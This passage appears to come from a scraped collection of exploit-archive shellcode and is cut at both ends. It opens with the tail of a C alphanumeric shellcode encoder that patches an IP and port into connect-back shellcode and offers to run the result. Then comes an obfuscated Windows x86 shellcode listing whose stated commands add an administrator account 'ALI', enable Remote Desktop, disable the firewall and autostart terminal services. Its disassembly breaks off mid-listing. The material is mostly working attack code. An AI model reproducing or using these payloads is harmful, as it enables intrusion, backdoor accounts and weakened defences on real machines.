is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_imul_key_offset1) = offset_imul_key; // | | *(decoder+offset_imul_key_offset2) = offset_imul_key; // | | *(decoder+offset_imul_key_offset3) = offset_imul_key; // | | // // | | printf("size_decoder-1=0x%2X - %s\n", // | | (UCHAR)size_decoder-1, // | | is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_size_decoder_min_1) = size_decoder-1; // | | // | | printf("size_decoder+2=0x%2X - %s\n", // | | (UCHAR)size_decoder+2, //////// | | is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+offset_size_decoder_pls_2) = size_decoder+(decoder_version_1?2:0); //////// | | // | | *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder; ////////////////////////////// | | // | | *(decoder+offset_jne_xor1) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 0); // | | *(decoder+offset_jne_xor2) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 1); // | | #ifdef CONNECT_BACK_SHELLCODE // | | ip_address = ip_str_to_dw(IP_ADDRESS);/////////////////////////////////////////////////// | | if (ip_address == -1) /////////////////////////////////////////////////// | | exit(-1); // | | /////////////////////////////////// | | //set shellcode with ip address and port for connect-back // | | ///* ////////// | | *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS)) = ip_address;///////////////// | | *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER)) = my_htonl(TCP_PORT_NUMBER);// | | *(p_shellcode+OFFSET_TCP_PORT_NUMBER) = (UCHAR)2; // | | #endif ////////////////////////////////////////// | | //*/ // | | //set decoder with 'random' nop slides // | | strncpy(decoder+offset_nop_slide1, //////////////////////////// | | shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),// | | size_nop_slide1); // | | strncpy(decoder+offset_nop_slide2, // | | shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),// | | size_nop_slide2); /////////////////////////////// | | // | | //set decoder with random initial key //////////////////////////////////////////// | | *(decoder+offset_imul_key) = get_random_alnum_value();// | | printf("initial key=0x%2X - %s\n", ////////////// | | (UCHAR)*(decoder+offset_imul_key), // | | is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!"); // | | // | | ////////////// | | // | | //set decoder with 'random' dword pushes for registers we won't use //////////////// | | *(decoder+OFFSET_PUSH_DWORD1) = get_random_alnum_push_dword_opcode(); // | | printf("push dword1=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD1), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD2) = get_random_alnum_push_dword_opcode(); // | | printf("push dword2=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD2), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD3) = get_random_alnum_push_dword_opcode(); // | | printf("push dword3=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD3), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD4) = get_random_alnum_push_dword_opcode(); // | | printf("push dword4=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD4), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");// | | // | | //bugfix: this time after srand() :) // | | xor_al1=get_random_alnum_value(); // | | xor_al2=get_random_alnum_value(); // | | *(decoder+OFFSET_XOR_AL1_A) = xor_al1; // | | *(decoder+OFFSET_XOR_AL1_B) = xor_al1; // | | *(decoder+OFFSET_XOR_AL2_A) = xor_al2; // | | *(decoder+OFFSET_XOR_AL2_B) = xor_al2; // | | // | | memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD, ////// | | randomize_decoder_head(decoder, size_decoder, xor_al1, *(decoder+offset_jne_xor1)), // <---here-------------------------|---' SIZE_RANDOMIZED_DECODER_HEAD); ////// | //set first xor1 to random alnum value (this is the first byte of the encoded data) // | xor1 = get_random_alnum_value(); // | printf("xor1=0x%2X - %s\n", // | (UCHAR)xor1, // | is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!"); // | ///////////////////////////////////////////////////////// | RE_RUN: // | sprintf(alnum_shellcode, "%s",decoder); // | memset(temp_buf, 0, 3);/////////////////// | for(i=0; i<size; i++) // | { ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | // each original byte is encoded into 3 alphanumeric bytes where first_byte*third_byte^second_byte==original_byte // | // third_byte is the next encoded original byte's first_byte // | // the first byte of the terminating key is the last byte's third_byte /////// | p_xor2_key=get_xor2_and_key_for_xor1_and_c(xor1, shellcode[i]);//get a list of second_byte and third_byte for first_byte// | if(!p_xor2_key) /////// | goto RE_RUN; // | p_xor2_key = choose_random_node(p_xor2_key);//choose a random combination//////////////////////////////////////////// | key=p_xor2_key->key; // | xor2=p_xor2_key->xor2; // | temp_buf[0] = xor1; // | temp_buf[1] = xor2; // | strcat(alnum_shellcode, temp_buf); // append it to our decoder // | xor1=key; // | free_p_xor2_key(p_xor2_key); // free the list // | } //get next original_byte // | //////////////////////// | if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))// | { // | printf("error - terminating key found in encoded shellcode. running again to fix\n");// | goto RE_RUN; // | } ///////////////////////////////////////////////////// | *(UCHAR*)(alnum_shellcode+8) = key; // set the last key of the encoded data to be the first byte of the terminating string | *(UCHAR*)(alnum_shellcode+9) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| strncat(alnum_shellcode, // append the terminating string to the decoder+encoded shellcode | (UCHAR*)(alnum_shellcode+offset_terminating_key), ////////////////////////////// | 4); // | // | //bugfix: handle case of esp pointing to shellcode // | if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp")) // | { // | // _asm{ // | // push esp; // | // pop eax; // | // xor al, 0x36; // | // xor al, 0x30; // | // } // | p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6); // | memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6); // | memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1); // | p_alnum_shellcode[0] = 'T'; // | p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax // | p_alnum_shellcode[2] = '4'; // and using other xor values // | p_alnum_shellcode[3] = '6'; // <-- (x+6) // | p_alnum_shellcode[4] = '4'; // // | p_alnum_shellcode[5] = '0'; // <-- x // | p_alnum_shellcode[8] = get_push_register_instruction("eax"); // | p_alnum_shellcode[9] = get_push_register_instruction("eax"); // | size_decoder += 6; // | } // | // | printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder); // | printf("decoder length: %d\n%s\n", // | size_decoder, // | p_alnum_shellcode); // | // | printf("scanning alnum_shellcode for shellcode up to size bytes\n"); // | found_msg = scan_str_known_pattern(alnum_shellcode, shellcode, size); ///////// | if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg); // | else printf("shellcode not found encoded in alnum_shellcode.\n"); /////////////////////////// | // | if (str_is_alnum(alnum_shellcode)) // | { // | printf("execute shellcode locally? (hit: y and press enter): ");// | if(tolower(getchar()) == 'y') // | { ///////////// | _asm // | { // | push p_alnum_shellcode; //////// | pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;// <------------------------------------------------------------------------' //jump to head of decoder // jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;// } ////////////// } // } // else // { /////////////// printf("error non-alphanumeric shellcode\n"); // } ////////////////////////////// ///////// // return 0; ////// } // /////////////////// BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*alnum_str[offset+offset2])^alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*alnum_str[offset+offset2+1])^alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_xor_arg2_imul_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]^alnum_str[offset+offset2])*alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]^alnum_str[offset+offset2+1])*alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_imul_key_xor_arg2(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UCHAR key, UINT offset1, UINT offset2) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*key)^alnum_str[offset+offset2])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*key)^alnum_str[offset+offset2+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length) { UCHAR *alnum = malloc(strlen(ALNUM_CHARSET)+1); UCHAR *temp_buf = malloc(255); strncpy(alnum, ALNUM_CHARSET, strlen(ALNUM_CHARSET)); alnum[strlen(ALNUM_CHARSET)]=0; memset(temp_buf, 0, 255); //this is not for production, just a poc... while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 0, 1)) { alnum--; strcat(temp_buf, "(buf[0]*'"); temp_buf[strlen(temp_buf)] = *alnum; strcat(temp_buf, "')^buf[1]"); return(temp_buf); } } alnum-=strlen(ALNUM_CHARSET); while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 1, 0)) { alnum--; printf("key = 0x%2X ('%c')\n", *alnum, *alnum); return("found pattern using: (buf[1]*key)^buf[0]\n"); } } if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 0, 1)) return("(buf[0]*0x30)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 1, 0)) return("(buf[1]*0x30)^buf[0]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 0, 1)) return("(buf[0]*0x10)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 1, 0)) return("(buf[1]*0x10)^buf[0]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]*buf[1])^buf[2]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]*buf[2])^buf[1]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]*buf[2])^buf[0]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]^buf[1])*buf[2]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]^buf[2])*buf[1]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]^buf[2])*buf[0]"); else return ""; } BOOL is_alnum(UCHAR c) { char *alnum = ALNUM_CHARSET; char search_c[2] = ""; search_c[0] = c; return((BOOL)strstr(alnum, search_c)); } BOOL str_is_alnum(UCHAR *str) { ULONG length; length = strlen(str); for(;length>0;length--) { if( !is_alnum(str[length-1]) ) return 0; } return 1; } UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index) { int xor_complement_1, xor_complement_2; UCHAR two_xor_complements[3]; for(xor_complement_1=0; xor_complement_1<MAX_BYTES; xor_complement_1++) { if (is_alnum((UCHAR)xor_complement_1)) { for(xor_complement_2=0; xor_complement_2<MAX_BYTES; xor_complement_2++) { if (is_alnum((UCHAR)xor_complement_2)) { if(byte == (xor ^ xor_complement_1 ^ xor_complement_2)) { two_xor_complements[0] = (UCHAR)xor_complement_1; two_xor_complements[1] = (UCHAR)xor_complement_2; } } } } } if(index == 0 || index == 1) return two_xor_complements[index]; else return (UCHAR)0; } BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key) { return (BOOL) strstr(alnum_shellcode, terminating_key); } DWORD ip_str_to_dw(UCHAR *str) { DWORD x[4]; int dwIpAddress; if (!str || MAX_IP_STR_LEN < strlen(str) || strlen(str) < MIN_IP_STR_LEN) return -1; sscanf(str, "%d.%d.%d.%d", &x[0],&x[1],&x[2],&x[3]); x[3] = x[3] > 255 ? -1 : (x[3] <<= 24); x[2] = x[2] > 255 ? -1 : (x[2] <<= 16); x[1] = x[1] > 255 ? -1 : (x[1] <<= 8); x[0] = x[0] > 255 ? -1 : (x[0] <<= 0); dwIpAddress = x[0]+x[1]+x[2]+x[3]; return dwIpAddress; } DWORD my_htonl(DWORD dw_in) { DWORD dw_out; *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0); *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1); *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2); *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3); return dw_out; } void free_p_xor2_key(struct xor2_key *node) { struct xor2_key *temp = 0; if(node) { temp = node->prev; while(node->next) { node=node->next; free(node->prev); } free(node); } if(temp) { while(temp->prev) { temp=temp->prev; free(temp->next); } free(temp); } } struct xor2_key *choose_random_node(struct xor2_key *head) { int num_nodes = 1, selected_node, i; struct xor2_key* tail = head; struct xor2_key* pn = NULL ; if (!head || !head->key) return 0; while(tail->next) { tail = tail->next; num_nodes++; } selected_node = rand()%num_nodes; for(i=0; i<selected_node; i++) head = head->next; return head; } struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c) { struct xor2_key *p_xor2_key, *p_xor2_key_head; char *alnum = ALNUM_CHARSET; UINT i=0, z=1, r=0, count=0; UCHAR xor2=0, x=0; p_xor2_key_head = p_xor2_key = malloc(sizeof(xor2_key)); p_xor2_key->prev = 0; p_xor2_key->next = 0; p_xor2_key->key = 0; p_xor2_key->xor2 = 0; for(i=0; alnum[i]; i++) { for(x=0; alnum[x];x++) { xor2 = alnum[x]; if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c) { p_xor2_key->xor2 = xor2; p_xor2_key->key = alnum[i]; p_xor2_key->next = malloc(sizeof(struct xor2_key)); p_xor2_key->next->prev = p_xor2_key; p_xor2_key = p_xor2_key->next; p_xor2_key->key=0; p_xor2_key->xor2=0; } } } if(!p_xor2_key->key) p_xor2_key->next = 0; if (p_xor2_key->prev) p_xor2_key = p_xor2_key->prev; else return 0; free(p_xor2_key->next); p_xor2_key->next=0; return p_xor2_key_head; } UCHAR *shuffle(UCHAR str[], UINT length) //length does not include terminating null. { UINT last, randomNum; UCHAR temporary; UCHAR *output = malloc(length); memcpy(output, str, length); for (last = length; last > 1; last--) { randomNum = rand( ) % last; temporary = output[randomNum]; output[randomNum] = output[last-1]; output[last-1] = temporary; } memcpy(str, output, length); return output; }// taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) { UCHAR *prefix_substr, *substr, *suffix_substr, *output_str; UINT prefix_substr_len, suffix_substr_len; if(slide > substr_offset) { printf("you can't slide it that far back!\n"); return 0; } output_str = malloc(str_len); memset(output_str, 0 , str_len); suffix_substr_len = str_len-substr_len-substr_offset; suffix_substr = malloc(suffix_substr_len); memset(suffix_substr, 0, suffix_substr_len); prefix_substr_len = substr_offset; prefix_substr = malloc(prefix_substr_len); memset(prefix_substr, 0, prefix_substr_len); substr = malloc(substr_len); memset(substr, 0, substr_len); strncpy(substr, str+substr_offset, substr_len); strncpy(prefix_substr, str, prefix_substr_len); strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); strncpy(output_str, prefix_substr, prefix_substr_len-slide); strncpy(output_str+prefix_substr_len-slide, substr, substr_len); strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide); strncpy(output_str+prefix_substr_len-slide+substr_len+slide, str+substr_offset+substr_len, suffix_substr_len); free(prefix_substr); free(suffix_substr); free(substr); return output_str; } UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) { UCHAR *prefix_substr, *substr, *suffix_substr, *output_str; UINT prefix_substr_len, suffix_substr_len; if(slide > str_len-substr_len-substr_offset) { printf("you can't slide it that far forward!\n"); return 0; } output_str = malloc(str_len); memset(output_str, 0 , str_len); suffix_substr_len = str_len-substr_len-substr_offset; suffix_substr = malloc(suffix_substr_len); memset(suffix_substr, 0, suffix_substr_len); prefix_substr_len = substr_offset; prefix_substr = malloc(prefix_substr_len); memset(prefix_substr, 0, prefix_substr_len); substr = malloc(substr_len); memset(substr, 0, substr_len); strncpy(substr, str+substr_offset, substr_len); strncpy(prefix_substr, str, prefix_substr_len); strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); strncpy(output_str, prefix_substr, prefix_substr_len); strncpy(output_str+prefix_substr_len, suffix_substr, slide); strncpy(output_str+prefix_substr_len+slide, substr, substr_len); strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide); free(prefix_substr); free(suffix_substr); free(substr); return output_str; } UCHAR *get_nop_slide(UINT size, UINT slide) { //simple alnum nop slide generator UINT i, x, append_dec_eax = 0; UCHAR alnum_nop[][3] = { "AI", //inc ecx;dec ecx // (alnum_nop[0]) "BJ", //inc edx;dec edx // (alnum_nop[1]) "CK", //inc ebx;dec ebx // (alnum_nop[2]) "EM", //inc ebp;dec ebp // (alnum_nop[3]) "FN", //inc esi;dec esi // (alnum_nop[4]) "GO", //inc edi;dec edi // (alnum_nop[5]) [we don't care about eax value before the imul] "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2 [instruction as it overwrites eax with result ] "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2 [and we don't care about edi value at all. ] "DL", //inc esp;dec esp // (alnum_nop[8]) --- [todo: need to preserve stack state] >--. //we can freely inc/dec esp for now // "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state] >--| //but we need to take it into account // "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state] >--| //once we start pushing/poping to/from // "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state] >--' //the stack. // | //TODO: <-----------------------------------------------------------------------------------' // push eax push eax push eax push ecx push edx // pop eax push ecx push ecx dec esp pop edx // push ecx pop ecx push edx inc esp push ecx // pop ecx pop eax inc esp pop ecx pop ecx // push edx push edx dec esp push eax push eax // pop edx pop edx pop edx inc esp pop eax // pop ecx dec esp . // pop eax pop eax . // push edx . // pop edx etc... }; UCHAR *nop_slide; nop_slide = malloc(size); memset(nop_slide, 0, size); if(size%2) { append_dec_eax = 1; size--; } for(i=0; i<(size/2); i++) { do x = rand()%(sizeof(alnum_nop)/3); while ((slide==2)&&(x==6||x==7)); strcat(nop_slide, alnum_nop[x]); } if(append_dec_eax) { strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide } return nop_slide; } UCHAR get_random_alnum_push_dword_opcode() { UCHAR alnum_push_dword_opcode[] = { 'P', //0x50 push eax 'Q', //0x51 push ecx 'R', //0x52 push edx 'S', //0x53 push ebx 'T', //0x54 push esp 'U', //0x55 push ebp 'V', //0x56 push esi 'W' //0x57 push edi }; return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)]; } UCHAR get_random_alnum_value() { char alnum_values[] = ALNUM_CHARSET; return alnum_values[rand()%strlen(alnum_values)]; } UCHAR get_push_register_instruction(UCHAR *reg) { if (!strcmp(reg, "eax")) return 'P'; //0x50 push eax else if (!strcmp(reg, "ecx")) return 'Q'; //0x51 push ecx else if (!strcmp(reg, "edx")) return 'R'; //0x52 push edx else if (!strcmp(reg, "ebx")) return 'S'; //0x53 push ebx else if (!strcmp(reg, "esp")) return 'T'; //0x54 push esp else if (!strcmp(reg, "ebp")) return 'U'; //0x55 push ebp else if (!strcmp(reg, "esi")) return 'V'; //0x56 push esi else if (!strcmp(reg, "edi")) return 'W'; //0x57 push edi else return 0; } UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1) { UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10}; UCHAR instructions[11][3]; UCHAR instruction_comments[11][28]; UINT i,c, state; UCHAR *output; UCHAR *random_states; UCHAR *p_state[5]; output = malloc(17); memset(output, 0, 17); memset(instructions, 0, 11*3); memset(instruction_comments, 0, 11*28); instructions[0][0] = '\x6a'; //j instructions[0][1] = xor_al1; // instructions[1][0] = '\x58'; //X instructions[2][0] = '\x34'; //4 instructions[2][1] = xor_al1; // instructions[3][0] = '\x48'; //H instructions[4][0] = '\x34'; //4 instructions[4][1] = jne_xor1; // instructions[5][0] = '\x30'; //0 instructions[5][1] = '\x42'; //B instructions[5][2] = size_decoder-1; // instructions[6][0] = '\x52'; //R instructions[7][0] = '\x52'; //R instructions[8][0] = '\x59'; //Y instructions[9][0] = '\x47'; //G instructions[10][0] = '\x43'; //C strcat(instruction_comments[0], "push XOR_AL1"); strcat(instruction_comments[1], "pop eax"); strcat(instruction_comments[2], "xor al, XOR_AL1"); strcat(instruction_comments[3], "dec eax"); strcat(instruction_comments[4], "xor al, JNE_XOR1"); strcat(instruction_comments[5], "xor byte ptr [edx+size], al"); strcat(instruction_comments[6], "push edx"); strcat(instruction_comments[7], "push edx"); strcat(instruction_comments[8], "pop ecx"); strcat(instruction_comments[9], "inc edi"); strcat(instruction_comments[10], "inc ebx"); do { memset(p_state, 0, sizeof(UCHAR*)*5); random_states = shuffle(states, 11); //.*0.*1.*2.*3.*4.*5 p_state[0] = memchr(random_states, 0, 11); if(p_state[0]) p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states)); //.*[67].*8 if(p_state[1]) { p_state[2] = memchr(random_states, 6, 11); p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); if(!p_state[3]) { p_state[2] = memchr(random_states, 7, 11); p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); } if(p_state[3]) { //.*1.*[67].*[67] if(p_state[2] && p_state[1] < p_state[2]) p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states)); //.*0.*[67].*8.*1 if(!p_state[4]) p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states)); if(!p_state[4]) p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states)); //.*[67].*8.*0.*1.*[67] if(!p_state[4]) p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 1, 11-(p_state[3]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states)); } } } while (!p_state[4]); for (c=state=0; state<sizeof(states); state++) { i=0; while (instructions[random_states[state]][i] && i < 3) { output[c] = instructions[random_states[state]][i]; i++; c++; } } printf("======================\ndecoder head instruction order: %x %x %x %x %x %x %x %x %x %x %x\n", random_states[0], random_states[1], random_states[2], random_states[3], random_states[4], random_states[5], random_states[6], random_states[7], random_states[8], random_states[9], random_states[10] ); printf("%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n======================\n", instruction_comments[random_states[0]], instruction_comments[random_states[1]], instruction_comments[random_states[2]], instruction_comments[random_states[3]], instruction_comments[random_states[4]], instruction_comments[random_states[5]], instruction_comments[random_states[6]], instruction_comments[random_states[7]], instruction_comments[random_states[8]], instruction_comments[random_states[9]], instruction_comments[random_states[10]]); return output; }
  5. #Author: Ali Razmjoo #Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] Obfuscated Shellcode Windows x86 [1218 Bytes].c /* #Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] #length: 1218 bytes #Date: 13 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x86 ultimate WinExec => 0x7666e695 ExitProcess => 0x76632acf ==================================== Execute : net user ALI ALI /add net localgroup Administrators ALI /add NET LOCALGROUP "Remote Desktop Users" ALI /add reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f netsh firewall set opmode disable sc config termservice start= auto ==================================== Ali Razmjoo , ['[email protected]','[email protected]'] Thanks to my friends , Dariush Nasirpour and Ehsan Nezami C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: b8 41 41 41 64 mov $0x64414141,%eax 8: c1 e8 08 shr $0x8,%eax b: c1 e8 08 shr $0x8,%eax e: c1 e8 08 shr $0x8,%eax 11: 50 push %eax 12: b9 6d 76 53 52 mov $0x5253766d,%ecx 17: ba 4d 59 32 36 mov $0x3632594d,%edx 1c: 31 d1 xor %edx,%ecx 1e: 51 push %ecx 1f: b9 6e 72 61 71 mov $0x7161726e,%ecx 24: ba 4e 33 2d 38 mov $0x382d334e,%edx 29: 31 d1 xor %edx,%ecx 2b: 51 push %ecx 2c: b9 6c 75 78 78 mov $0x7878756c,%ecx 31: ba 4c 34 34 31 mov $0x3134344c,%edx 36: 31 d1 xor %edx,%ecx 38: 51 push %ecx 39: b9 46 47 57 46 mov $0x46574746,%ecx 3e: ba 33 34 32 34 mov $0x34323433,%edx 43: 31 d1 xor %edx,%ecx 45: 51 push %ecx 46: b9 56 50 47 64 mov $0x64475056,%ecx 4b: ba 38 35 33 44 mov $0x44333538,%edx 50: 31 d1 xor %edx,%ecx 52: 51 push %ecx 53: 89 e0 mov %esp,%eax 55: bb 41 41 41 01 mov $0x1414141,%ebx 5a: c1 eb 08 shr $0x8,%ebx 5d: c1 eb 08 shr $0x8,%ebx 60: c1 eb 08 shr $0x8,%ebx 63: 53 push %ebx 64: 50 push %eax 65: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 6a: ba 33 52 64 59 mov $0x59645233,%edx 6f: 31 d3 xor %edx,%ebx 71: ff d3 call *%ebx 73: 31 c0 xor %eax,%eax 75: 50 push %eax 76: 68 41 41 64 64 push $0x64644141 7b: 58 pop %eax 7c: c1 e8 08 shr $0x8,%eax 7f: c1 e8 08 shr $0x8,%eax 82: 50 push %eax 83: b9 01 41 60 32 mov $0x32604101,%ecx 88: ba 48 61 4f 53 mov $0x534f6148,%edx 8d: 31 d1 xor %edx,%ecx 8f: 51 push %ecx 90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx 95: ba 5b 67 4c 63 mov $0x634c675b,%edx 9a: 31 d1 xor %edx,%ecx 9c: 51 push %ecx 9d: b9 03 24 36 21 mov $0x21362403,%ecx a2: ba 62 50 59 53 mov $0x53595062,%edx a7: 31 d1 xor %edx,%ecx a9: 51 push %ecx aa: b9 34 41 15 18 mov $0x18154134,%ecx af: ba 5d 32 61 6a mov 